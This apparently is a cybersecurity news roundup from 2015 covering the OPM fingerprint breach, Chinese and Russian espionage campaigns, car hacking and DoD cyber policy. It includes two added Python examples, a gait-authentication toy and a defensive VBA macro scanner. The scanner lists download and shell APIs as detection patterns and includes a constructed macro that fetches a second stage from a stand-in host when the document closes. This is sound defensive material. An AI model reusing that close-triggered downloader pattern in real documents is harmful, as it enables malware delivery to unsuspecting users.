DHS Is Funding a Boeing Project for Enhanced Biometrics to Be Used as a Means for Device Self-Destruction

DHS is funding a Boeing project for enhanced biometrics to be used as a means for device self-destruction after identifying it is no longer being used by its owner:

The technology powering the devices potentially could identify the user’s walking style, for example. Officials would be alerted if the gait does not match the authorized user’s walk – a red flag the phone might have fallen into the wrong hands, officials said.

The “secret sauce” of the mobile device is a so-called neuromorphic computer chip that simulates human learning, Vincent Sritapan, the program manager for DHS’ mobile device security program, told Nextgov.

Gait recognition — driven by the phone’s accelerometer, GPS and the chip — is but one of many kinds of continuous ID verification intended to tighten access controls on mobile devices.

Boeing and HRL Laboratories, a software firm jointly owned by Boeing and General Motors, are partnering under a DHS project worth $2.2 million over 2.5 years.

The companies “pretty much are leveraging user behavior information” from data gathered by sensors found on any standard consumer smartphone, Sritapan said. Those feelers could include microphones, cameras and touchpads, he added. The artificial intelligence could help agencies determine, “Are you who you say you are, and do we give you access to enterprise resources like email?” he said.

This sounds quite intriguing.
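To make the continuous-verification idea concrete, here is a small added illustration of how an accelerometer-driven gait check can feed a device's trust state. It is not Boeing, HRL or DHS code, and nothing in the article describes their actual features or model; the sample rate, the two features (step cadence and bounce amplitude), the thresholds and the constructed accelerometer traces are all assumptions made for the example. The design point it shows is the defender's one: a single mismatch is only "suspicious", repeated mismatches lock the device, and windows in which the phone is not moving are treated as "idle" rather than as evidence of an impostor.

```python
"""Toy continuous authentication from gait features (added example, not DHS/Boeing code)."""
import math
from statistics import mean, pstdev

SAMPLE_RATE_HZ = 50  # assumed accelerometer sample rate


def synth_walk(cadence_hz, amplitude, seconds, phase=0.0):
    """Constructed accelerometer magnitudes: gravity plus a periodic step bounce."""
    n = int(seconds * SAMPLE_RATE_HZ)
    return [9.81 + amplitude * math.sin(2 * math.pi * cadence_hz * i / SAMPLE_RATE_HZ + phase)
            for i in range(n)]


def gait_features(samples):
    """Two coarse gait features: step cadence (Hz) and bounce amplitude (m/s^2)."""
    m = mean(samples)
    centered = [s - m for s in samples]
    # Each upward zero crossing of the centred signal is one step cycle.
    steps = sum(1 for a, b in zip(centered, centered[1:]) if a < 0 <= b)
    seconds = len(samples) / SAMPLE_RATE_HZ
    cadence = steps / seconds
    amplitude = pstdev(centered) * math.sqrt(2)  # RMS -> peak for a sinusoid
    return cadence, amplitude


def gait_distance(features, template):
    """Relative distance between an observed window and the enrolled template."""
    (c, a), (tc, ta) = features, template
    return math.hypot((c - tc) / tc, (a - ta) / ta)


class ContinuousAuth:
    """Running trust state: 'ok', 'suspicious', 'locked', or 'idle' (not walking)."""

    def __init__(self, template, threshold=0.25, fail_limit=3, idle_floor=0.3):
        self.template = template          # (cadence, amplitude) enrolled from the owner
        self.threshold = threshold        # assumed match tolerance
        self.fail_limit = fail_limit      # mismatches in a row before locking
        self.idle_floor = idle_floor      # below this bounce, the phone is not being carried
        self.consecutive_failures = 0
        self.locked = False

    def observe(self, window):
        if self.locked:
            return "locked"
        features = gait_features(window)
        if features[1] < self.idle_floor:
            return "idle"                 # no gait evidence either way; do not count it
        if gait_distance(features, self.template) <= self.threshold:
            self.consecutive_failures = 0
            return "ok"
        self.consecutive_failures += 1
        if self.consecutive_failures >= self.fail_limit:
            self.locked = True
            return "locked"
        return "suspicious"


if __name__ == "__main__":
    owner = synth_walk(1.8, 1.6, 10, phase=0.3)          # constructed enrolment walk
    auth = ContinuousAuth(gait_features(owner))
    print(auth.observe(synth_walk(1.8, 1.6, 10, phase=1.1)))   # same gait, later start
    for _ in range(3):
        print(auth.observe(synth_walk(1.3, 2.8, 10, phase=0.3)))  # a different walker
```

The enrolment template and the observed windows go through the same feature extractor, so any systematic error cancels; a real deployment would use many more features and a learned model, but the lock-after-repeated-mismatch and idle-window handling carry over unchanged.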

OPM Breach Exposed Fingerprints of 5.6 Million US Government Employees

Another week, another round of bad news about the OPM breach. This time we learn the fingerprints of 5.6 million US government employees were exfiltrated by the ostensible Chinese hackers:

The attack on the agency, which is the main custodian of the government’s most important personnel records, has been attributed to China by American intelligence agencies, but it is unclear exactly what group or organization engineered it. Before Wednesday, the agency had said that it lost only 1.1 million sets of fingerprints among the records of roughly 22 million individuals that were compromised.

“Federal experts believe that, as of now, the ability to misuse fingerprint data is limited,” the agency said in a written statement. But clearly the uses are growing as biometrics are used more frequently to assure identity, in secure government facilities and even on personal iPhones.

The working assumption of investigators is that China is building a huge database of information about American officials or contractors who may end up entering China or doing business with it. Fingerprints could become a significant part of that effort: While a Social Security number or a password can be changed, fingerprints cannot.

Customs and immigration officials frequently fingerprint incoming travelers; millions of fingerprints in a Chinese database would help track the true identities of Americans entering the country.

“I am assuming there will be people we simply can’t send to China,” a senior intelligence official said this summer, before the most recent revelation. “That’s only part of the damage.”

The agency said that an “interagency working group,” with help from the F.B.I., the Department of Homeland Security and the intelligence agencies, “will review the potential ways adversaries could misuse fingerprint data now and in the future.”

The OPM breach is going to be studied for the next few years and will become the premier case study on how not to conduct cyber security. It is amazing they still have not increased their cyber defense capabilities since this all came to light a few short months ago.

Huge Surge in Targeted Cyber Attacks in Japan in 2015

According to a report by the Japanese National Police Agency, there was a huge surge in targeted cyber attacks in Japan in 2015:

The National Police Agency said it recorded 1,472 attacks from January to June, NHK news agency reported.

The agency monitors such attacks in coordination with more than 6,900 defence and nuclear-related firms and others, which are the main targets.

In targeted attacks, emails carrying computer viruses are sent to companies and government offices in a bid to steal classified information. Typically, the virus is hidden in an attached file sent with the e-mail.

The agency said cases in which a Microsoft Word document was used to automatically download an illicit programme accounted for 64 percent of all incidents involving attached files. That’s up from two percent last year.

Two US Senators Are Asking Automobile Manufacturers for Details on Their Cyber Security Strategies

Ever since the proof-of-concept hack against Jeep, automobile cyber security has been on people's minds. This time two US senators are asking automobile manufacturers for details on their cyber security strategies:

Two U.S. senators have asked the world’s biggest automakers for information on steps they have taken to protect cars from being hacked, as attention on vehicle security has surged following the first car recall over a cyber bug.

Democratic Senators Edward Markey and Richard Blumenthal wrote to 18 automakers on Wednesday asking about efforts taken to secure vehicles including 2015 and 2106 models. They asked automakers how they test electronic components and communications systems to ensure attackers cannot gain access to onboard networks.

Concerns about auto cyber security have grown since July, when researchers gained remote control of a moving Jeep, prompting Fiat Chrysler Automobiles (FCAU.N) (FCHA.MI) to recall some 1.4 million vehicles for a software update.

The request from the senators follows a review that Markey began in December 2013. He concluded in a February 2015 report that the spread of technology connecting vehicles to networks had outpaced industry and government efforts to protect vehicles from hackers.

The senators said they want to know what automakers have done since the last survey to beef up security.

Lawmakers Accuse DHS of Stonewalling on Cyber Security Plans

In the this-is-not-a-surprise department, lawmakers accuse DHS of stonewalling on cyber security plans:

“The department has persisted in its ‘go it alone’ mentality and has ignored Congress’ requests for information despite a record that demonstrates its need for oversight and accountability,” added Rep. John Ratcliffe (R-Texas), who chairs the panel’s subcommittee on cybersecurity, infrastructure protection and security technologies.

The DHS has played an increasingly important role in the government’s cybersecurity effort over the last year.

Congress late last year passed a series of bills that strengthened the agency’s cyber workforce and codified certain aspects of the DHS cybersecurity mission.

Lawmakers are currently considering more bills that would further clarify the agency’s cyber role while strengthening its authority to proactively investigate and defend federal networks across the government.

The House Homeland Security Committee is also drafting a bill that would transform the NPPD.

McCaul said the committee would soon hold hearings as lawmakers work to draft the legislation.

“We welcome the department’s input and look forward to working closely with them on streamlining NPPD’s structure,” he said.

The committee’s bill would rename the NPPD to Cybersecurity and Infrastructure Protection. It would also create two positions to oversee the new wing: a deputy undersecretary for cybersecurity and a deputy undersecretary for infrastructure protection.

China May Have Conducted a Cyber Attack Against the Russian Military

Even though Russia has highly advanced cyber attack capabilities, this does not mean they are immune to operations designed to breach their networks. It would seem China may have conducted a cyber attack against the Russian military:

“There is a world market for classified data of any time,” said Epstein. “There are documented cases in the past where private hackers hacked into various institutions and then sold the data to nation states. The lines are increasingly blurred in the world of cybersecurity.”

The attack starts with a well-written Russian-language email that seems to come from someone else in the targeted military division or an analyst section from the same group of the military, he said.

It comes with an attached document, a Microsoft Word file with a published article about the history of military testing in Russia.

“It’s a decoy document,” said Epstein. “You double-click on it, you open it, you read it, you think, ‘Ah, that was kind of interesting.’ Then you close it and you don’t think about it again. But when it closes, it activates a macro, and the macro triggers a secondary file to take action, which is to download a third file, which is the nasty stuff.”

That’s when the malware takes over the computer and everything the user has access to, the attackers now have access to.

“Any anti-virus program wouldn’t see a virus in the document because there’s no virus in the document,” he said. “And the trigger on closing is a common anti-sandboxing technique because most sandboxes check for triggering when documents are opened, not when they are closed.”

This is a fairly standard, yet highly advanced, technique for evading endpoint anti-virus. This is why layered defenses extend beyond the network and need to be implemented at the endpoint level too. Tools like application whitelisting, host intrusion prevention, and desktop firewalls, when used together, greatly reduce the chance that malware of this type executes successfully.

Who here wonders if this attack was actually perpetrated by the United States but made to appear as if China is responsible?
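The close-triggered macro Epstein describes, and the Word-document downloaders behind the Japanese NPA figures above, are both visible in the macro source once it has been pulled out of the document. The following is an added example of a defender-side triage heuristic for that source; it is not code from either report or from any vendor. It assumes the VBA text has already been extracted (a tool such as olevba does this) and is handed over as a string, and the three macro samples are constructed. The point it makes is the one in the quote: a sandbox that only opens the document never sees a close handler, so the scanner treats the close-time auto-exec names as first-class triggers rather than an afterthought.

```python
"""Heuristic triage of extracted VBA source for auto-executing, downloading macros.
Added example; assumes the VBA has already been extracted from the document."""
import re

# Procedure names Office runs without a click, grouped by when they fire.
AUTO_EXEC = {
    "open": ("AutoOpen", "Document_Open", "Workbook_Open", "Auto_Open"),
    "close": ("AutoClose", "Document_Close", "Workbook_BeforeClose", "Auto_Close"),
}

# Capabilities that matter when they sit inside an auto-exec procedure.
CAPABILITIES = {
    "network": re.compile(r"\b(XMLHTTP|WinHttp|URLDownloadToFile|InternetOpen)\b", re.I),
    "execute": re.compile(r"\b(Shell|WScript\.Shell|CreateObject|ShellExecute)\b", re.I),
    "filesystem": re.compile(r"\b(Open\s+.+\s+For\s+Binary|FileSystemObject|Environ)\b", re.I),
}

# One Sub/Function at a time: name in group 1, body in group 2.
PROC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\b(.*?)^\s*End\s+(?:Sub|Function)",
    re.I | re.M | re.S,
)


def procedures(vba_source):
    """Yield (name, body) for every procedure in the source."""
    for m in PROC_RE.finditer(vba_source):
        yield m.group(1), m.group(2)


def triage(vba_source):
    """Return findings as (procedure, trigger or None, [capabilities]) tuples."""
    findings = []
    for name, body in procedures(vba_source):
        trigger = next((kind for kind, names in AUTO_EXEC.items()
                        if name.lower() in {n.lower() for n in names}), None)
        caps = [cap for cap, pat in CAPABILITIES.items() if pat.search(body)]
        if trigger or caps:
            findings.append((name, trigger, caps))
    return findings


def verdict(findings):
    """'block' for an auto-exec procedure that reaches out or runs things,
    'review' for anything else worth a look, 'clean' otherwise."""
    for _name, trigger, caps in findings:
        if trigger and {"network", "execute"} & set(caps):
            return "block"
    return "review" if findings else "clean"


# Constructed samples (not real malware): a formatting macro, a close-triggered
# fetcher shaped like the one in the article, and a plain utility procedure.
BENIGN_MACRO = """\
Sub AutoOpen()
    ' constructed sample: only touches document formatting
    ActiveDocument.Range.Font.Name = "Calibri"
End Sub
"""

CLOSE_FETCHER_MACRO = """\
Private Sub Document_Close()
    ' constructed sample: fires on close, reaches out for a second stage
    Dim h As Object
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", "http://example.invalid/stage2", False
    ' ... second stage would be handled here ...
End Sub
"""

UTILITY_MACRO = """\
Sub FormatTable()
    Selection.Tables(1).AutoFormat
End Sub
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_MACRO), ("close-fetcher", CLOSE_FETCHER_MACRO),
                       ("utility", UTILITY_MACRO)):
        print(label, verdict(triage(src)), triage(src))
```

Name-based triggers are only the first layer: a macro can also be wired to a form control or a self-invoking event, and strings can be assembled at run time to dodge the capability patterns, which is why this kind of static look is paired with the endpoint controls named above rather than used on its own.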

Seven Years of Malware Linked to Russian State-Backed Cyber-Espionage Group

An apparently state-backed cyber-espionage group based in Russia has conducted a targeted malware campaign targeting foreign governments over the course of the past seven years:

For the past seven years, a cyber-espionage group operating out of Russia—and apparently at the behest of the Russian government—has conducted a series of malware campaigns targeting governments, political think tanks, and other organizations. In a report issued today, researchers at F-Secure provided an in-depth look at an organization labelled by them as “the Dukes,” which has been active since at least 2008 and has evolved into a methodical developer of “zero-day” attacks, pulling together their own research with the published work of other security firms to provide a more detailed picture of the people behind a long-running family of malware.

Characterized by F-Secure researchers as a “well resourced, highly dedicated and organized cyberespionage group,” the Dukes have mixed wide-spanning, blatant “smash and grab” attacks on networks with more subtle, long-term intrusions that harvested massive amounts of data from their targets, which range from foreign governments to criminal organizations operating in the Russian Federation. “The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks and governmental subcontractors,” the F-Secure team wrote. “Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen terrorism; and Russian speakers engaged in the illicit trade of controlled substances and drugs.”

The first known targets of the Dukes’ earliest-detected malware, known as PinchDuke, were associated with the Chechen separatist movement. By 2009 the Dukes were going after Western governments and organizations in search of information about the diplomatic activities of the United States and the North Atlantic Treaty Organization. While most of the attacks have used spear phishing e-mails as the means of injecting malware onto targeted systems, one of their attacks has spread malware through a malicious Tor exit node in Russia, targeting users of the anonymizing network with malware injections into their downloads.

China-Based Cyber Attacks on US Military Are ‘Advanced, Persistent and Ongoing’

Another day, another news item about state-backed, China-based cyber attacks. This time Trend Micro has released a comprehensive report detailing how China-based cyber attacks on US military targets are “Advanced, Persistent And Ongoing”:

In its blog announcing the paper, Trend Micro stated that “Operation Iron Tiger is a targeted attack campaign discovered to have stolen trillions of bytes of data from defense contractors in the U.S., including stolen emails, intellectual property, and strategic planning documents.” The report further details that targets of Iron Tiger included military defense contractors, intelligence agencies, FBI-based partners, and the U.S. government. The private entities were tech-based government contractors in the electric, aerospace, intelligence, telecommunications, energy, and nuclear engineering industries.

Iron Tiger was observed exfiltrating up to 58GB worth of data from a single target, more than was stolen in the Sony attack. It could have potentially stolen up to terabytes of data in total, Trend Micro reports. It is highly environmentally adaptive and otherwise sophisticated and well organized, potentially merely an arm of a larger, multi-teamed operation with various targets.

China is convincingly Iron Tiger’s home base

The primary situs of China as the operatives’ home base was convincingly evidenced by the facts that the operatives used virtual private network (VPN) servers that only accepted China-based registrants, used Chinese file names and passwords, and operated from China-registered domains, according to the report. Some of Iron Tiger’s actions were also attributed to an individual physically located in China.

DoD CIO Says There Is a Need to Make It Cost Prohibitive for Hackers to Conduct Cyber Attacks

DoD CIO Terry Halvorsen is talking tough on cyber, stating there is a need to make it cost prohibitive for hackers to conduct cyber attacks:

“We are on the wrong side of the cyber economic curve,” he said at the summit. “We need to raise barriers to attackers’ entry, making it more expensive to play.”

But how? The answer is multifold, but at least one aspect is automation, mechanizing some of the basic actions and response involved in cybersecurity maintenance, Halvorsen said.

Automation is key to turning around the economics and coping with the speed of the threat, he said at the summit and on the call.

“Automating eliminates the basic [adversarial] players, makes it so you have to raise your game to play,” Halvorsen said. “It reduces the benefit hackers will see and makes it more expensive for hackers to play.”

Another key part is establishing a pervasive, standard-operating-procedure culture of cybersecurity throughout entire enterprises and communities. It’s a worry that Halvorsen said keeps him up at night.

“How do I get a cyber discipline culture, how do I get a cyber economic culture and how do I get a cyber enterprise culture? I think those are the three things that if we got those, almost everything else comes after,” he said. “If I get to the cyber enterprise culture, I’ll start doing integrated, layered defenses, I’ll use automated tools — [joint regional security stacks are] the cornerstone for that — I’ll get the right level of accountability and I will understand the money.”

The only way DoD will get to where it needs to be in cyber security is through a cultural shift. Once senior DoD leaders recognize they are the biggest threat to the enterprise network, and thus stop asking for unnecessarily risky exceptions to DoD policy simply because they are who they are, then DoD may finally realize the type of discipline needed for the future.

US Cyber Command Designing System to Stay Ahead of Hackers but Will Require Manual Data Entry

United States Cyber Command is designing a system to stay ahead of hackers but apparently they are currently incapable of acquiring technology to automate this functionality:

U.S. Cyber Command is building a massive, electronic system to provide an overview of the vulnerabilities of the military’s computer networks, weapons system and installations and help officials prioritize how to fix them, its deputy commander said on Thursday.

Lieutenant General Kevin McLaughlin told Reuters officials should reach agreement on the framework within months, turning the system into an automated “scorecard” in coming years.

McLaughlin said the effort grew out of a disturbing report released earlier this year by the Pentagon’s chief weapons tester, Michael Gilmore. The report warned that nearly every major U.S. weapons system was vulnerable to cyber attacks, and an escalating number of attacks on U.S. computer networks by Russia and China.

Cyber Command staff would do the initial data entry by hand, but the goal was to create a fully automated system that would help defense officials instantaneously detect and respond to any attacks, McLaughlin said after a speech at the annual Billington Cybersecurity Summit.

Here we are in 2015 and US Cyber Command is developing a program designed to perform initial data entry manually. Seriously?